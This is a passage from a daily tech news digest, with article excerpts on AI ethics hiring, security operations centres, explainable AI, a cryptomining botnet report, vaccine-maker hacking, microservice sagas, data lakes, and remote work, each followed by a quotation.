Iterative visualization is achieved by creating a strategy map, which tracks a proposed strategy’s causal path backward from its desired outcome to the factors required to make it happen. The authors illustrate this process by producing a strategy map based on statements about Walmart’s low-cost model, which enabled the retailer to attract customers and vanquish competitors in the pre-digital economy. Working backward from the desired outcome of low costs, they map two of its enablers: operational efficiencies and a bargaining advantage over suppliers. In turn, they enumerate the enablers of those enablers, which for bargaining include high-volume purchasing, negotiating prowess, and private labels. And so on. A strategy map is only the first step in making a strategy argument. “At this stage,” Sørensen and Carroll explain, “these statements are just unfounded claims in the strategy argument, and their veracity and importance have yet to be demonstrated.” That work begins in the second set of activities — logical formalization. Logical formalization entails testing the validity and soundness of the premises underlying the statements in a strategy map.



Quote for the day:

"If you only read the books that everyone else is reading, you can only think what everyone else is thinking." -- Haruki Murakami

Daily Tech Digest - March, 02, 2021

Looking For An AI Ethicist? Good Luck

Just like with the hunt for data scientists, the person in charge of driving the AI ethics strategy at a company ideally will have a long list of qualifications. According to Ammanath, who was a Datanami Person to Watch for 2020, an AI ethicist generally should have the following skills and capabilities: An understanding of AI tools and technology; An understanding of the business and the industry and the specific AI ethical traps that exist in them; Good communication skills and the ability to work across organizational boundaries; And regulatory, legal, and policy knowledge. There are additional skills that may be required, such as having experience with the philosophical, psychological, or sociological aspects of ethics; knowing how to structure a business and a team in an ethical manner; and even knowing how to mitigate the environmental impact of using AI. “The point is that you need to have a wide variety of skills,” Ammanath says. “It’s like finding that unicorn…Trying to find that person with credible experience and knowledge in all of these areas is practically impossible.” So where does that leave you? The odds are, unless you’re working at a very large enterprise, you won’t be able to find a person to fit this exact job description.


Building a Next-Generation SOC Starts With Holistic Operations

Today's reimagined SOCs bring together disparate teams to counteract intrusions, providing everyone with a coordinated, holistic, real-time view. This tactic empowers analysts to head things off, "shifting left" in the cyber kill chain to identify the full scope of the attack while it's happening and quickly block it as far upstream as possible (ideally using automated investigation and response). We see this as the only way for SOCs to address new threats in time to avert major business impacts. It's time to empower your SOC with multidomain, central teams. It's more than tools differentiating a reactive SOC from an agile, proactive, successful one. Modernizing security operations requires an operational model that drives cross-technology integration to match the attacker's modus operandi. Empowering your SOC to deploy speedy, effective countermeasures means dangerous attackers will be slowed or deterred, reducing damage to your business and saving valuable time and money. The proper template for a modernized SOC team operates seamlessly across domains with an end-to-end view. Consider your SOC's opposition: Sophisticated bad actors see the entire picture, know where they're going and who they're engaging, and understand how to exploit weaknesses.


Can we explain AI? An Introduction to Explainable Artificial Intelligence.

Why do we need to explain AI? This is a question that has no simple answer to it. Suppose you take the example of my project that I mentioned initially. In that case, the controller might want to understand our trust models. It is hard to believe something we do not understand. We have a problem when we cannot explain the decisions made by an algorithm. In assessing AI’s decisions, it is crucial to assess the factors that led to that decision. We will therefore be able to audit and challenge decisions or work to improve the factors. This is where the importance of xAI, or explainable AI, comes in, which addresses the need to be able to interpret a model of Machine Learning. This is because it is typical for the formulation of problems addressed by ML to be incomplete. Often, forecasting is not enough to address a problem. It is essential to know more than just “what,” but also “why,” “how.” It is not enough to know that a teacher has been poorly classified in one year; it is also essential to know the reason for improvement. Although AI is one of the most important and disruptive technologies of the century, it is subject to bias. Good model accuracy can be a trap.


Why IT Should Have a Separate Training Budget

Large IT organizations can fund their own training departments, complete with their own training directors. Often these individuals have experience in both IT and education -- and they do a great job. But in many other cases, there is no formal IT training function -- only an IT training budget. In these cases, the CIO, project managers and other IT leadership must step in. They identify the core skills that they need and the individuals whom they want to send to these trainings -- and what the training will cost. This strategy of collectively evaluating IT staff, with each manager coming forth with his or her staff training needs, works -- but it’s far from flawless. The major downside is that people who are not skilled in education or training might not make the right training choices -- either in courses or in the people they send. ... Hot projects and keeping systems running are IT priorities, not training. So, if there is a hot project, or a major performance issue with an existing system, training is quickly forgotten. The result is that training that was budgeted gets deferred or isn't used at all. This makes for a very tough fight for the CIO when the next budget review comes around. The CFO will undoubtedly challenge the IT training budget, saying that the budget was underused last year so should be re-funded at that lesser level.


Indian Vaccine Makers, Oxford Lab Reportedly Hacked

The Chinese state-backed hacking group APT10, also known as Stone Panda, has in recent weeks targeted the IT systems of two Indian pharmaceutical makers whose coronavirus vaccines are being used in the country's immunization program, the Reuters news service reports, citing a report from Tokyo, Japan-based cybersecurity firm Cyfirma. That company says that hackers identified gaps and vulnerabilities in the IT infrastructure and supply chain software of the pharmaceutical firm Bharat Biotech and the Serum Institute of India, or SII, one of the largest vaccine makers globally, Reuters reports. Cyfirma says the apparent motivation behind the hackers' efforts was an attempt to exfiltrate intellectual property of the pharmaceutical firms, according to Reuters. SII is making the AstraZeneca vaccine for many countries and will soon start bulk-manufacturing Novavax shots, the news service reports. Cyfirma, SII and Bhara Biotech did not immediately respond to Information Security Media Group's requests for comment. ... Meanwhile, last week, Forbes reported that U.K.-based Oxford University's Division of Structural Biology – known as Strubi - had been hacked, with equipment used to prepare biochemical samples targeted.


Rethinking the artificial intelligence race

The way that AI systems are developed naturally creates doubts about their ability to function in untested environments, namely the requirement of large amounts of data inputs, the necessity that they be nearly perfect, and the effects of the preconceived notions of its creators. First, lack of, or erroneous, data is one of the largest challenges, especially when relying on machine learning techniques. To teach a computer to recognize a bird, it must be fed thousands of pictures to “learn” a bird’s distinguishing features, which naturally limits use in fields with few examples. Additionally, if even a tiny portion of the data is incorrect (as little as 3%), the system may develop incorrect assumptions or suffer drastic decreases in performance. Finally, the system may also recreate assumptions and prejudices—racist, sexist, elitist, or otherwise—from extant data that already contains inherent biases, such as resume archives or police records. These could also be coded in as programmers inadvertently impart their own cognitive biases into the machine learning algorithms they design. This propensity for deep-seated decision-making problems, which may only become evident well after development, will prove problematic to those that want to rely heavily on AI, especially concerning issues of national security.


How Leaders Can Help Their Teams Manage Stress in the New Year

Employees need to take vacations to reset and get their minds off of their work, but modern work policies don’t encourage time off the way they should. Plenty of companies offer generous or even unlimited amounts of vacation time, but workers are reticent to indulge lest they fall behind. The easiest solution to this issue is to simply mandate that workers take the time off they need. To combat the high-stress levels endemic to companies in their industry, game developer Supergiant Games instituted a policy stating that workers must take a minimum of 20 days off annually while still allowing for unlimited time away. A similar policy for your workplace will help employees cool off right when they need to the most. ... Your workers will never be able to achieve stress equilibrium if their boss can’t do it first. Being a great business leader isn’t just about telling people what they need to do; it’s about modeling those behaviors yourself. If you’re preaching stress reduction to your team while clocking in 11 hours a day, no one is going to be able to take your messaging seriously. Stress management starts with you, whether you like it or not.


Google Introduces Low Bitrate Speech Codec For Smoother Communication

Lyra is a novel method for compressing and transmitting voice signals. For this, the researchers applied traditional codec techniques and the latest machine learning methods on models trained on vast amounts of data. Lyra extracts features or distinctive speech attributes (list of numbers representing the speech energy in different frequency bands, called log mel spectrograms) from the input every 40ms and compresses before transmitting. At the receiving end, a generative model converts the features to a speech signal. Lyra’s new and improved ‘natural-sounding’ generative models maintain a low bitrate of codecs to achieve high-quality codecs, generally on par with state-of-art waveform codecs used in streaming platforms. However, one drawback of these generative models is computational complexity. To overcome this, Lyra uses a cheaper variation of WaveRNN, a recurrent generative model. Though it works at a lower rate, it generates multiple parallel signals in different frequencies. These signals are then combined to output a signal at the desired sample rate. Hence, Lyra works on cloud servers and mid-range phones with a processing latency of 90ms.


Cryptomining Botnet Uses Bitcoin Wallet to Avoid Detection

The initial infection starts with the exploitation of remote code execution vulnerabilities in Hadoop Yarn, Elasticsearch (CVE-2015-1427) and ThinkPHP (CVE-2019-9082). The payload delivered causes the vulnerable machine to download and execute a malicious shell script. "In older campaigns, the shell script itself handled the key functions of infection. The stand-alone script disabled security features, killed off competing infections, established persistence, and in some cases, continued infection attempts across networks found within the known host files," the report notes. But the newer instances of the shell script are written with fewer lines of code and use binary payloads for handling more system interactions, such as killing off competition, disabling security features, modifying SSH keys, downloading malware and starting the miners. Researchers note that the operators behind the campaign use cron jobs and rootkits for persistence and updates to distribution, ensuring infected machines will regularly check in and be reinfected with the latest version of the malware. These methods rely on domains and static IP addresses written into crontabs and configurations, and these domains and IP addresses routinely get identified and seized, the researchers say.


Saga Orchestration for Microservices Using the Outbox Pattern

There are two general ways for implementing distributed Sagas—choreography and orchestration. In the choreography approach, one participating service sends a message to the next after it has executed its local transaction. With orchestration, on the other hand, there’s one coordinating service that invokes one participant after the other. Both approaches have their pros and cons. Personally, I prefer the orchestration approach, as it defines one central place that can be queried to obtain the current status of a particular Saga (the orchestrator, or “Saga execution coordinator,” SEC for short). Since it avoids point-to-point communication between participants, (other than the orchestrator), it also allows for the addition of further intermediary steps within the flow, without the need to adjust each participant. Before diving into the implementation of such Saga flow, it’s worth spending some time to think about the transactional semantics that Sagas provide. ... From a service consumer point of view—e.g., a user placing a purchase order with the order service—the system is eventually consistent; i.e., it will take some time until the purchase order is in its correct state, as per the logic of the different participating services.



Quote for the day:

"In any leadership position, the most important aspect of your job will be getting your team to work together." -- Dale Brown

Daily Tech Digest - February 19, 2021

Data lake storage: Cloud vs on-premise data lakes

The data lake is conceived of as the first place an organisation’s data flows to. It is the repository for all data collected from the organisation’s operations, where it will reside in a more or less raw format. Perhaps there will be some metadata tagging to facilitate searches of data elements, but it is intended that access to data in the data lake will be by specialists such as data scientists and those that develop touchpoints downstream of the lake. Downstream is appropriate because the data lake is seen, like a real lake, as something into which all data sources flow, and they are potentially, many, varied and unprocessed. From the lake, data would go downstream to the data warehouse, which is taken to imply something more processed, packaged and ready for consumption. While the data lake contains multiple stores of data, in formats not easily accessible or readable by the vast majority of employees – unstructured, semi-structured and structured – the data warehouse is made up of structured data in databases to which applications and employees are afforded access. A data mart or hub may allow for data that is even more easily consumed by departments. So, a data lake holds large quantities of data in its original form. Unlike queries to the data warehouse or mart, to interrogate the data lake requires a schema-on-read approach.


Microsoft Azure Front Door Gets a Security Upgrade

Johnson uses three principles to describe zero trust, the first of which involves adopting explicit verification for every transaction during a session: "So not just verifying the human, but the device, the data, the location, if it's an IoT device, the application – everything that happens in the session should be verified and anomalous behavior should be flagged," she explains. The second principle is ensuring least privilege access. Many organizations still provide too much privileged access to employees, Johnson says. One of the steps Microsoft is taking with its content and application delivery is implementing more controls around access. The third principle: "Then, finally, assume you've been breached," she says. Assumed breach is a topic the security industry has discussed for years, but with zero trust, they have to assume they have been breached, and that anything within the organization could potentially be breached. These principles have grown essential as application-delivery networks undergo a massive transformation to the cloud, Johnson explains. The new capabilities in Azure Front Door aim to provide organizations with one platform that meets availability, scalability, and security needs.


Tools And Models Used In Software Testing

Software testing is a significant part of software quality assurance (SQA), it is an activity used for evaluating and improving software quality. It involves a set of activities carried out with the sole aim of finding errors in software. It validates and verifies if the software or product is functioning correctly without any errors or bugs capable of incurring defects. In the testing phase, the errors from previous cycles must be detected, this ensures complete software reliability and quality assurance. With the development of software functionalities, it is essential to use innovative testing models and tools to ensure that time and cost spent on testing is thoroughly minimized. When it comes to testing the functionality of the software, there are two types; manual and automation. Manual testing is carried out by the tester. Informal review, inspection, walkthrough, and technical review are the techniques of manual testing. Manual testing is time-consuming and requires more effort, this is a major issue with this kind of testing. Test Automation helps to completely resolve and control these issues. Automated testing can be categorized into four; performance testing, safety testing, accuracy testing and testing of reliability. Using automation tools, steps involved in manual testing are being automated.


Combining Three Pillars Of Cybersecurity Security

As cybersecurity gaps abound, there has been a growing panic in both industry and government on how to protect the cyber landscape. In the past, three significant risk management themes have been put forward to help ameliorate the digital risk ecosystem including: security by design, defense in depth, and zero trust. They are a triad, or three strong pillars of risk management needed for a successful cybersecurity strategy. Security by Design is really the initiation point of a risk management process—especially if you are a software or hardware developer concerned with security. In an article in United States Cybersecurity magazine, cybersecurity expert Jeff Spivey provided an excellent working definition: “Security by Design ensures that security risk governance and management are monitored, managed and maintained on a continuous basis. The value of this “holistic” approach is that it ensures that new security risks are prioritized, ordered and addressed in a continual manner with continuous feedback and learning.” Defense in Depth. A variety of strong definitions exist for defense in depth in the security community. 


The Future of Team Leadership Is Multimodal

Effective leadership in this new hybrid world requires different skills that go beyond traditional team leadership. Specifically, organizations will need leaders who can operate well across two distinct modes. For much of the time, they will operate in virtual coordination mode. This means establishing goals, monitoring progress, driving information sharing, and sustaining connections among colleagues working remotely. When their teams periodically come together to engage in true collaboration, leaders will need to operate in face-to-face collaboration mode, fostering deep learning, innovation, acculturation, and dedication. The nature and mix of team tasks will dictate the modes in which those teams operate. Tasks that involve working interdependently but without much integration — reporting, performing administrative tasks, making simple decisions, sharing information, drafting documents, and performing financial analyses — will mostly be done virtually. Likewise, our research and experience have shown that most one-on-one interactions between leaders and their reports, including some coaching, can be accomplished effectively through virtual means However, essential tasks that require team members to integrate their knowledge, create safe spaces for dialogue on difficult issues, and form emotional connections cannot be done productively while working virtually.


Unstructured data: the hidden threat in digital business

With the growth of unstructured data comes the unfortunate truth that it’s much more difficult to control and secure than structured data. For example, if an employee is taking information in the form of unstructured data and moving it elsewhere, they may store the original document or picture on a local file share or send it in an email as an attachment. Within one organization, the process for handling documents could vary across employees and teams, and it’s very likely that management has no idea this is happening. Unstructured data doesn’t have to be a forever risk, though. It’s entirely possible for organizations to manage and incorporate it into safe data practices and protocols. For that to happen successfully, business leaders must do the following: First, acknowledge that unsecured unstructured data is a problem within the organization. Add it as an urgent priority for the IT or data security teams to address. Don’t wait until an issue arises or assume that hackers are going to go after larger volumes of what one assumes is more “attractive” data. We’ve learned that hackers are unpredictable and that no organization, no matter the size or scope, is immune to the threat.


How You Can Expedite Your Venture With Machine Learning

With machine learning tools, organizations can figure out gainful opportunities as well as possible risks more promptly. ML aids companies in improving business scalability and enhancing business operations. The rapidly evolving new techniques in the ML field are expanding the usage of machine learning to nearly infinite possibilities. The article focuses on how you can expedite your business growth with the use of machine learning, and here are the key points: Prediction of the market segment: When businesses are entering into the market with a new idea, it is very important to understand and forecast the reactions of the market. If you go with human intelligence for a logical prediction, it would be a huge task to consider all the applicable parameters from a large set of historical data. However, if you make use of the correct classification algorithm(s), you can predict the response from the prospective market segment if it is good, bad, or neutral. Besides, you can use continuous or regression algorithms to predict the size or range. Prediction of customer lifetime value: For marketers, it is quite important to know about the customer lifetime value prediction and customer segmentation. For this, companies use huge amounts of data effectively with the help of ML and data mining to obtain meaningful business insights. 


Manufacturing outlook for 2021 focuses on resilience

The prime driver for the acceleration is the drive to implement e-commerce platforms either for B2B or direct-to-consumer commerce, Yavar said. "Manufacturers are all chasing the KPI thresholds around quality and on-time delivery that Amazon set, so everybody's trying to get as close as possible to that two-day or one-day service," he said. "That's not easily done, so they're scrambling to understand how deploying technology like robotics can speed up the process and strategically align distribution functions, whether it's in-house or external, to cut costs." The increasing importance of the supply chain as a vital business process will spur innovation and bring new players into the market, Yavar explained. "It's akin to the ERP market of the 1990s and early 2000s where there was the traditional 'Big 5,' but then we saw the explosion of players with the advent of cloud. The same thing's happening in the supply chain technology space today," he said. "The barrier to entry to produce the technology and get in the marketplace is much lower than it used to be, so this market will become more and more dynamic over time, there will be consolidation, and new technology and the supply chain will be seen not as a cost center but a differentiator for manufacturers over the next several years."


CIOs Face Decisions on Remote Work for Post-Pandemic Future

The evolution of the global remote work force had its share of growing pains, says Cortney Thompson, CIO with cloud solutions and managed services provider Lunavi. Early on, opportunistic vendors made quick pushes to offer services to companies in dire need to go remote, but he says some stumbled along the way. “A few of those vendors had scaling problems as they brought additional load on,” Thompson says. That made it important to listen to the experiences companies were having with those vendors, he says, and how their performance changed in response. Naturally if organizations did not see the results they wanted, they looked to branch out to other providers in the market, Thompson says. While some vendors took a conservative approach in taking on clients at the onset of the pandemic, he says others focused on grabbing as much of the market as possible without such restraint. In some instances, things broke under pressure, Thompson says. “There were some supply chain issues along the way and there was stress on the system and cracks started to show.” Innovations that found their footing during the pandemic include the zero-trust approach to security, he says, with higher adoption rates. 


Data Security Accountability in an Age of Regular Breaches

When it comes to information security, cyber hygiene is remarkably analogous to biological hygiene. Much like the immune system within an organism, poor digital security hygiene can result in an infection (security incident) progressing into a full-blown compromise (data breach). The expectation is that the breached organization will take active measures to mitigate the effects of the data breach, and it ends there. However, this is not enough. Much like taking precautions against spreading the COVID-19 infection, individuals must play their part in reducing their own levels of digital security contagion. Following any discovered infection resulting from a breach (digital or biological), the best process is to engage in measures to quarantine yourself to reduce the exposure of others. One of the most basic digital hygiene methods simply relies upon the user deploying complex and unique passwords for each service they utilize. While this would be the first port of call when a data breach is discovered, the fact is such a practice is rarely followed, and further explains many of the breaches we've experienced to date. To address this, the general public's attitude toward passwords needs to evolve to that of phone numbers.



Quote for the day:

"Leadership offers an opportunity to make a difference in someone's life, no matter what the project." -- Bill Owens